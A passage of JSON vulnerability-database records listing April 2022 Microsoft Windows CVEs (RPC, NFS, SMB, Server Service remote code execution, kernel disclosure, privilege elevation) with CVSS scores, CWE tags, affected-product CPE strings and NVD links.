"cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:58", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24492, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24528", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-21T20:49:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24528", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24528", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:53", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24528, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24492", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-19T17:31:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24492", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24492", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:00", "description": "Windows Network File System Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24491.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24497", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-22T17:05:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-24497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24497", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:53", "description": "Windows Network File System Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24497.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24491", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-22T17:48:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-24491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24491", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:01", "description": "Windows Server Service Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24541", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24541"], "modified": "2022-04-25T15:44:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24541", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24541", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:51", "description": "Windows Kernel Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24483", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2022-04-22T18:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", 
"cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-24483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24483", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:38", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26904", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-26T14:08:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-26904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26904", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:54", "description": "Windows SMB Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24500", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-04-22T15:54:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", 
